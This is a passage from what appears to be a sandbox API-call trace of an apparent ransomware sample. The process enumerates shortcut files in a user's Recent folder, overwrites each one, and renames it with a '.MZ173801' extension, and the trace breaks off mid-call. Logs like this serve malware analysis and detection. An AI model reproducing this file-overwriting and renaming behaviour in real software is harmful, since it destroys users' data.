CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VmAilK6Ug.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vmailk6ug.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.066] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x4ad, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x4ad, lpOverlapped=0x0) returned 1 [0112.067] CloseHandle (hObject=0x3f4) returned 1 [0112.068] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VmAilK6Ug.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vmailk6ug.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\VmAilK6Ug.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\vmailk6ug.lnk.mz173801")) returned 1 [0112.068] GetCurrentThreadId () returned 0x1358 [0112.068] GetCurrentThreadId () returned 0x1358 [0112.068] GetCurrentThreadId () returned 0x1358 [0112.068] GetCurrentThreadId () returned 0x1358 [0112.068] GetCurrentThreadId () returned 0x1358 [0112.068] GetCurrentThreadId () returned 0x1358 [0112.068] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec17ca31, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9d04a7b8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9d070a9d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="WjAE.lnk", cAlternateFileName="")) returned 1 [0112.068] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.068] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.068] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjAE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wjae.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec17ca31, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9d04a7b8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9d070a9d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3d7)) returned 1 [0112.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.069] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.069] GetCurrentThreadId () returned 0x1358 [0112.069] GetCurrentThreadId () returned 0x1358 [0112.069] GetCurrentThreadId () returned 0x1358 [0112.257] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.257] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.258] GetCurrentThreadId () returned 0x1358 [0112.258] GetCurrentThreadId () returned 0x1358 [0112.258] GetCurrentThreadId () returned 0x1358 [0112.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjAE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wjae.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.258] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.258] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.258] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3d7 [0112.258] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.258] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x3d7, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x3d7, lpOverlapped=0x0) returned 1 [0112.259] CloseHandle (hObject=0x3f4) returned 1 [0112.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjAE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wjae.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.260] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x3d7, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x3d7, lpOverlapped=0x0) returned 1 [0112.261] CloseHandle (hObject=0x3f4) returned 1 [0112.262] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjAE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wjae.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\WjAE.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wjae.lnk.mz173801")) returned 1 [0112.263] GetCurrentThreadId () returned 0x1358 [0112.263] GetCurrentThreadId () returned 0x1358 [0112.263] GetCurrentThreadId () returned 0x1358 [0112.263] GetCurrentThreadId () returned 0x1358 [0112.263] GetCurrentThreadId () returned 0x1358 [0112.263] GetCurrentThreadId () returned 0x1358 [0112.263] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea08e4b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea08e4b1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea08e4b1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x426, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="wk25qq4bwLfkVhGZ.lnk", cAlternateFileName="WK25QQ~1.LNK")) returned 1 [0112.263] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.263] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.263] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\wk25qq4bwLfkVhGZ.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\wk25qq4bwlfkvhgz.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea08e4b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea08e4b1, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea08e4b1, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x426)) returned 1 [0112.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.264] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.264] GetCurrentThreadId () returned 0x1358 [0112.264] GetCurrentThreadId () returned 0x1358 [0112.264] GetCurrentThreadId () returned 0x1358 [0112.264] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.264] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 